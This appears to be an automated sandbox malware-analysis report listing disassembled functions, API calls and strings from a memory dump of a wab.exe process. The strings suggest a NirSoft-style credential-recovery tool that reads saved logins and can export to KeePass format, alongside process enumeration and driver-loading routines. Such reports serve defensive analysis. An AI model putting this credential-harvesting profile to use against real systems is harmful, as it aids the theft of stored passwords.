                                                • API ID: AddressProc$HandleModule
                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                • API String ID: 667068680-2887671607
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                • API String ID: 1607361635-601624466
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintf$memset$wcscpy
                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                • API String ID: 2000436516-3842416460
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1043902810-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                • API String ID: 2899246560-1542517562
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040DBCD
                                                • memset.MSVCRT ref: 0040DBE9
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                • API String ID: 3330709923-517860148
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040806A
                                                • memset.MSVCRT ref: 0040807F
                                                • _wtoi.MSVCRT ref: 004081AF
                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                • memset.MSVCRT ref: 004081E4
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                • String ID: logins$null
                                                • API String ID: 3492182834-2163367763
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                • memset.MSVCRT ref: 004085CF
                                                • memset.MSVCRT ref: 004085F1
                                                • memset.MSVCRT ref: 00408606
                                                • strcmp.MSVCRT ref: 00408645
                                                • _mbscpy.MSVCRT ref: 004086DB
                                                • _mbscpy.MSVCRT ref: 004086FA
                                                • memset.MSVCRT ref: 0040870E
                                                • strcmp.MSVCRT ref: 0040876B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                • String ID: ---
                                                • API String ID: 3437578500-2854292027
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0041087D
                                                • memset.MSVCRT ref: 00410892
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1010922700-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                • malloc.MSVCRT ref: 004186B7
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                • malloc.MSVCRT ref: 004186FE
                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                • String ID: |A
                                                • API String ID: 4233704886-1717621600
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                • API String ID: 2081463915-1959339147
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                • API String ID: 2012295524-70141382
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                • API String ID: 667068680-3953557276
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDC.USER32(00000000), ref: 004121FF
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                • memcpy.MSVCRT ref: 0041234D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                • String ID:
                                                • API String ID: 1700100422-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                • String ID:
                                                • API String ID: 552707033-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                • memcpy.MSVCRT ref: 0040C11B
                                                • strchr.MSVCRT ref: 0040C140
                                                • strchr.MSVCRT ref: 0040C151
                                                • _strlwr.MSVCRT ref: 0040C15F
                                                • memset.MSVCRT ref: 0040C17A
                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                • String ID: 4$h
                                                • API String ID: 4066021378-1856150674
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: %%0.%df
                                                • API String ID: 3473751417-763548558
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                • GetParent.USER32(?), ref: 00406136
                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                • String ID: A
                                                • API String ID: 2892645895-3554254475
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                • memset.MSVCRT ref: 0040DA23
                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                • String ID: caption
                                                • API String ID: 973020956-4135340389
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf$wcscpy
                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                • API String ID: 1283228442-2366825230
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcschr.MSVCRT ref: 00413972
                                                • wcscpy.MSVCRT ref: 00413982
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                • wcscpy.MSVCRT ref: 004139D1
                                                • wcscat.MSVCRT ref: 004139DC
                                                • memset.MSVCRT ref: 004139B8
                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                • memset.MSVCRT ref: 00413A00
                                                • memcpy.MSVCRT ref: 00413A1B
                                                • wcscat.MSVCRT ref: 00413A27
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                • String ID: \systemroot
                                                • API String ID: 4173585201-1821301763
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy
                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                • API String ID: 1284135714-318151290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                • String ID: 0$6
                                                • API String ID: 4066108131-3849865405
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004082EF
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memset.MSVCRT ref: 00408362
                                                • memset.MSVCRT ref: 00408377
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 290601579-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memchrmemset
                                                • String ID: PD$PD
                                                • API String ID: 1581201632-2312785699
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
